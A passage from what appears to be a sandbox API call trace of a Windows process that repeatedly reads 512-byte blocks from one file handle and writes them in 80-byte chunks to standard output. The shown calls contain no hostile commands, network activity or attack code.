lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.791] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.791] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.792] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.794] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.794] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.795] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.795] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.796] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.797] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.797] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.798] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.798] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, 